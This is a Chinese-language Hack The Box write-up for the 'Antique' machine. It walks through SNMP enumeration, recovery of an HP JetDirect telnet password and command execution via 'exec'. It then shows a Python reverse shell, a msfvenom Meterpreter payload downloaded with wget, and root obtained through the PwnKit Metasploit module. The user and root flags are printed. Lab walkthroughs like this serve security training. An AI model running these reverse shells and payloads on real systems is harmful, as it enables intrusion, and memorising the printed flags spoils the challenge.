目录
连接至HTB服务器并启动靶机
1.After running an nmap scan on TCP ports we identify port 23 open. If we run another scan on UDP ports, which port do we find open?
2.What service is running on the UDP port that we identified in the previous question?
3.Let's connect to port 23 using the "telnet" command. What product name does Telnet give us that can help us identify the software that is in use?
4.What is the password for the HJ JetDirect Telnet service?
通过searchsploit工具对该关键词进行搜索
5.After we successfuly authenticate with the Telnet service, which command can we use to execute system commands?
6.Submit the flag located on the lp user's desktop.
USER_FLAG:4c78d4500a5c9f6281d7c3d9dd3ad3c8
7.The box is has a service listening on the 127.0.0.1 interface. What TCP port is it?
8.What version of CUPS is running on port 631?
9.What is the 2012 CVE associated with a local file read vulnerability in CUPS 1.6.1?
10.Submit the flag located in root's home directory.
将Meterpreter收回会话
ROOT_FLAG:5821059e12bbea7d6e680222d31cdd65
连接至HTB服务器并启动靶机
靶机IP:10.10.11.107
分配IP:10.10.16.22
1.After running an nmap scan on TCP ports we identify port 23 open. If we run another scan on UDP ports, which port do we find open?
使用nmap对靶机进行TCP、UDP端口扫描
nmap -p- --min-rate=1500 -T4 -sS -sU -Pn {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p- --min-rate=1500 -T4 -sS -sU -Pn 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 08:05 EDT
Warning: 10.10.11.107 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.107
Host is up (0.075s latency).
Not shown: 65534 closed tcp ports (reset), 307 closed udp ports (port-unreach), 65227 open|filtered udp ports (no-response)
PORT STATE SERVICE
23/tcp open telnet
161/udp open snmpNmap done: 1 IP address (1 host up) scanned in 347.51 seconds
由扫描结果可见,靶机开放UDP端口:161
2.What service is running on the UDP port that we identified in the previous question?
使用nmap对靶机161端口进行脚本、服务信息扫描
nmap -p 161 -sU -sCV {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p 161 -sU -sCV 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 09:12 EDT
Nmap scan report for 10.10.11.107
Host is up (0.079s latency).PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server (public)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
由扫描结果可见,SERVICE栏目下显示161端口运行的服务为:snmp
3.Let's connect to port 23 using the "telnet" command. What product name does Telnet give us that can help us identify the software that is in use?
使用snmpwalk枚举靶机SNMP服务
snmpwalk -v 1 -c public {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop]
└─# snmpwalk -v 1 -c public 10.10.11.107
iso.3.6.1.2.1 = STRING: "HTB Printer"
回显HTB Printer,尝试连接靶机Telnet服务
telnet {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.HP JetDirect
Password: root
Invalid password
Connection closed by foreign host.
尝试空密码无法进入,通过回显可见字符串:HP JetDirect
4.What is the password for the HJ JetDirect Telnet service?
通过searchsploit工具对该关键词进行搜索
searchsploit SNMP | grep 'JetDirect'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit SNMP | grep 'JetDirect'
HP JetDirect Printer - SNMP JetAdmin Device Passw | hardware/remote/22319.txt
将该漏洞PoC复制到当前目录下
searchsploit -m 22319.txt┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 22319.txt
Exploit: HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure
URL: https://www.exploit-db.com/exploits/22319
Path: /usr/share/exploitdb/exploits/hardware/remote/22319.txt
Codes: CVE-2002-1048, OSVDB-2079
Verified: True
File Type: ASCII text, with very long lines (323)
Copied to: /home/kali/Desktop/temp/22319.txt
查看该PoC内容
cat 22319.txt┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 22319.txt
HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3113A/J3263A/300.0 X Printer SNMP JetAdmin Device Password Disclosure Vulnerabilitysource: https://www.securityfocus.com/bid/7001/info
A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer.
It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances. By sending an SNMP GET request to a vulnerable printer, the printer will return the hex-encoded device password to the requester. This could allow a remote user to access and change configuration of the printer.
C:\>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
国产化后
HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3263A/300.0 X打印机SNMP JetAdmin设备密码泄露漏洞
来源:https://www.securityfocus.com/bid/7001/info
JetDirect打印机的问题可能会使远程用户获得对打印机的管理访问权限。
据报道,HP JetDirect打印机在某些情况下会泄露web JetAdmin设备密码。通过向易受攻击的打印机发送SNMP GET请求,打印机将向请求者返回十六进制编码的设备密码。这可以允许远程用户访问和更改打印机的配置。
C: \>直到将example.printer公开。1.3.6.1.4.1.11.2.3.9.1.1.13.0
利用payload枚举靶机SNMP服务密码:1.3.6.1.4.1.11.2.3.9.1.1.13.0
snmpwalk -v 1 -c public {TARGET_IP} .1.3.6.1.4.1.11.2.3.9.1.1.13.0┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# snmpwalk -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
获得一串密文,尝试将其中的空格都删除
504073737730726440313233212131323313917181922232526273031333435373839424349505154575861657475798283869091949598103106111114115119122123126130131134135再通过十六进制转ASCII进行解码
P@ssw0rd@123!!123q"2Rbs3CSs$4EuWGW(8i IYaA"1&1A5
截取相关凭证信息,密码为:P@ssw0rd@123!!123
5.After we successfuly authenticate with the Telnet service, which command can we use to execute system commands?
使用上文获取的密码登录靶机Telnet服务
telnet {TARGET_IP}┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.HP JetDirect
Password: P@ssw0rd@123!!123
登录成功后,回显提示我们输入"?"查看帮助
Please type "?" for HELP
> ?To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)exec: execute system commands (exec id)
exit: quit from telnet session
由回显可见,执行系统命令的命令为:exec
6.Submit the flag located on the lp user's desktop.
尝试利用python获得反弹shell
exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{NATIVE_IP}",{NATIVE_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.107] 48948
/bin/sh: 0: can't access tty; job control turned off
$ whoami
lp
提升tty
python3 -c 'import pty; pty.spawn("/bin/bash")'查看user_flag内容
cat user.txt$ python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ ls
ls
telnet.py user.txt
lp@antique:~$ cat user.txt
cat user.txt
4c78d4500a5c9f6281d7c3d9dd3ad3c8
USER_FLAG:4c78d4500a5c9f6281d7c3d9dd3ad3c8
7.The box is has a service listening on the 127.0.0.1 interface. What TCP port is it?
查看当前网络连接
ss -tan
由回显可见,在本地(127.0.0.1)有服务运行在端口:631
8.What version of CUPS is running on port 631?
通过curl命令查看631端口托管服务的相信息
curl 127.0.0.1:631lp@antique:~$ curl 127.0.0.1:631
curl 127.0.0.1:631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<TITLE>Home - CUPS 1.6.1</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
<LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
<BODY>
<TABLE CLASS="page" SUMMARY="{title}">
<TR><TD CLASS="body">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0" SUMMARY="">
<TR HEIGHT="36">
<TD><A HREF="http://www.cups.org/" TARGET="_blank"><IMG
SRC="/images/left.gif" WIDTH="64" HEIGHT="36" BORDER="0" ALT=""></A></TD>
<TD CLASS="sel"><A HREF="/"> Home </A></TD>
<TD CLASS="unsel"><A HREF="/admin"> Administration </A></TD>
<TD CLASS="unsel"><A HREF="/classes/"> Classes </A></TD>
<TD CLASS="unsel"><A HREF="/help/"> Online Help </A></TD>
<TD CLASS="unsel"><A HREF="/jobs/"> Jobs </A></TD>
<TD CLASS="unsel"><A HREF="/printers/"> Printers </A></TD>
<TD CLASS="unsel" WIDTH="100%"><FORM ACTION="/help/" METHOD="GET"><INPUT
TYPE="SEARCH" NAME="QUERY" SIZE="20" PLACEHOLDER="Search Help"
AUTOSAVE="org.cups.help" RESULTS="20"></FORM></TD>
<TD><IMG SRC="/images/right.gif" WIDTH="4" HEIGHT="36" ALT=""></TD>
</TR>
</TABLE><TABLE CLASS="indent" SUMMARY="">
<TR><TD STYLE="padding-right: 20px;"><H1>CUPS 1.6.1</H1>
<P>CUPS is the standards-based, open source printing system developed by
<A HREF="http://www.apple.com/">Apple Inc.</A> for OS<SUP>®</SUP> X and
other UNIX<SUP>®</SUP>-like operating systems.</P></TD>
<TD><A HREF="http://www.cups.org/"><IMG SRC="images/cups-icon.png" WIDTH="128"
HEIGHT="128" ALT="CUPS"></A></TD>
</TR>
</TABLE><TABLE CLASS="indent" SUMMARY="">
<TR><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-right: 20px;"><H2>CUPS for Users</H2>
<P><A HREF="help/overview.html">Overview of CUPS</A></P>
<P><A HREF="help/options.html">Command-Line Printing and Options</A></P>
<P><A HREF="help/whatsnew.html">What's New in CUPS 1.6</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.general">User Forum</A></P>
</TD><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;">
<H2>CUPS for Administrators</H2>
<P><A HREF="admin">Adding Printers and Classes</A></P>
<P><A HREF="help/policies.html">Managing Operation Policies</A></P>
<P><A HREF="help/accounting.html">Printer Accounting Basics</A></P>
<P><A HREF="help/security.html">Server Security</A></P>
<P><A HREF="help/kerberos.html">Using Kerberos Authentication</A></P>
<P><A HREF="help/network.html">Using Network Printers</A></P>
<P><A HREF="help/ref-cupsd-conf.html">cupsd.conf Reference</A></P>
<P><A HREF="http://www.cups.org/ppd.php">Find Printer Drivers</A></P>
</TD><TD VALIGN="top" STYLE="padding-left: 20px;">
<H2>CUPS for Developers</H2>
<P><A HREF="help/api-overview.html">Introduction to CUPS Programming</A></P>
<P><A HREF="help/api-cups.html">CUPS API</A></P>
<P><A HREF="help/api-filter.html">Filter and Backend Programming</A></P>
<P><A HREF="help/api-httpipp.html">HTTP and IPP APIs</A></P>
<P><A HREF="help/api-ppd.html">PPD API</A></P>
<P><A HREF="help/api-raster.html">Raster API</A></P>
<P><A HREF="help/ref-ppdcfile.html">PPD Compiler Driver Information File Reference</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.development">Developer Forum</A></P>
</TD></TR>
</TABLE></TD></TR>
<TR><TD> </TD></TR>
<TR><TD CLASS="trailer">CUPS and the CUPS logo are trademarks of
<A HREF="http://www.apple.com">Apple Inc.</A> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.</TD></TR>
</TABLE>
</BODY>
</HTML>
由回显中<TITLE>元素可见,该端口托管服务CUPS版本为:1.6.1
9.What is the 2012 CVE associated with a local file read vulnerability in CUPS 1.6.1?
启动Metasploit
msfconsole搜索CUPS 1.6.1
search CUPS 1.6.1
使用该模块
use post/multi/escalate/cups_root_file_read展示该模块信息
infomsf6 post(multi/escalate/cups_root_file_read) > info
Name: CUPS 1.6.1 Root File Read
Module: post/multi/escalate/cups_root_file_read
Platform: Linux, OSX
Arch:
Rank: Normal
Disclosed: 2012-11-20Provided by:
Jann Horn
joev <joev@metasploit.com>Compatible session types:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ERROR_LOG /var/log/cups/error_log yes The original path to the CUPS error log
FILE /etc/shadow yes The file to steal.
SESSION yes The session to run this module onDescription:
This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
CUPS allows members of the lpadmin group to make changes to the cupsd.conf
configuration, which can specify an Error Log path. When the user visits the
Error Log page in the web interface, the cupsd daemon (running with setuid root)
reads the Error Log path and echoes it as plaintext.This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
as long as the session is in the lpadmin group.Warning: if the user has set up a custom path to the CUPS error log,
this module might fail to reset that path correctly. You can specify
a custom error log path with the ERROR_LOG datastore option.References:
https://nvd.nist.gov/vuln/detail/CVE-2012-5519
OSVDB (87635)
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791
View the full module info with the info -d command.
由展示信息可见,该模块基于漏洞:CVE-2012-5519
10.Submit the flag located in root's home directory.
查看靶机系统信息
查看系统类型以及系统位数
uname
uname -mlp@antique:~$ uname
uname
Linux
lp@antique:~$ uname -m
uname -m
x86_64
通过获得的系统信息,生成相对于的Meterpreter马子
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={NATIVE_IP} LPORT=1234 -f elf > shell.elf┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.22 LPORT=1234 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
通过python开启一个http服务将马子上传至靶机
python -m http.server 7777靶机通过wget命令下载马子
wget http://{NATIVE_IP}:7777/shell.elf -O shell.elflp@antique:~$ wget http://10.10.16.22:7777/shell.elf -O shell.elf
wget http://10.10.16.22:7777/shell.elf -O shell.elf
--2024-10-24 04:52:16-- http://10.10.16.22:7777/shell.elf
Connecting to 10.10.16.22:7777... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: ‘shell.elf’shell.elf 100%[===================>] 250 --.-KB/s in 0s
2024-10-24 04:52:17 (33.7 MB/s) - ‘shell.elf’ saved [250/250]
在MSF中切换到监听模块:exploit/multi/handler
use exploit/multi/handler配置好参数:LHOST、LPORT、PAYLOAD
msf6 exploit(multi/handler) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
输入exploit、run开始监听,靶机执行运行shell.elf文件
lp@antique:~$ chmod +x shell.elf
chmod +x shell.elf
lp@antique:~$ ./shell.elf
./shell.elf
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.22:1234
[*] Sending stage (3045380 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.16.22:1234 -> 10.10.11.107:50326) at 2024-10-24
将Meterpreter收回会话
backgroundmeterpreter > background
[*] Backgrounding session 2...
切换到提权模块(post/multi/recon/local_exploit_suggester)进行扫描
use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run[*] 10.10.11.107 - Collecting local exploits for x64/linux...
[*] 10.10.11.107 - 198 exploit checks are being tried...
[+] 10.10.11.107 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_1043_io_uring_priv_esc: The target is vulnerable. > 1 CPU required, detected: 2
[+] 10.10.11.107 - exploit/linux/local/cve_2023_0386_overlayfs_priv_esc: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/netfilter_nft_set_elem_init_privesc: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.11.107 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/sudo_baron_samedit: The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[+] 10.10.11.107 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.31.pre.1ubuntu1.2 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 70 / 70
[*] 10.10.11.107 - Valid modules for session 2:
这里直接尝试第一个可利用模块:exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
需要配置参数:LHOST、LPORT、SESSION、PAYLOAD
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 7878
LPORT => 7878
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
输入run、exploit开始漏洞利用
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit
[*] Started reverse TCP handler on 10.10.16.22:7878
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ybwjexbl
[+] The target is vulnerable.
[*] Writing '/tmp/.sflzlca/fwxcodr/fwxcodr.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.sflzlca
[*] Sending stage (3045380 bytes) to 10.10.11.107
[+] Deleted /tmp/.sflzlca/fwxcodr/fwxcodr.so
[+] Deleted /tmp/.sflzlca/.arusgsxpspiz
[+] Deleted /tmp/.sflzlca
[*] Meterpreter session 3 opened (10.10.16.22:7878 -> 10.10.11.107:58106) at 2024-10-24 01:15:40 -0400meterpreter > getuid
Server username: root
可以看到顺利拿到了root权限
切换到终端
shell提升TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'查找root_flag位置
find / -name 'root.txt'查看root_flag内容
cat /root/root.txtmeterpreter > shell
Process 1982 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@antique:/# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@antique:/# cat /root/root.txt
cat /root/root.txt
5821059e12bbea7d6e680222d31cdd65
![HTB:CozyHosting[WriteUP]](https://i-blog.csdnimg.cn/direct/9a43660bf4334693aa8d1242c345b79c.png)
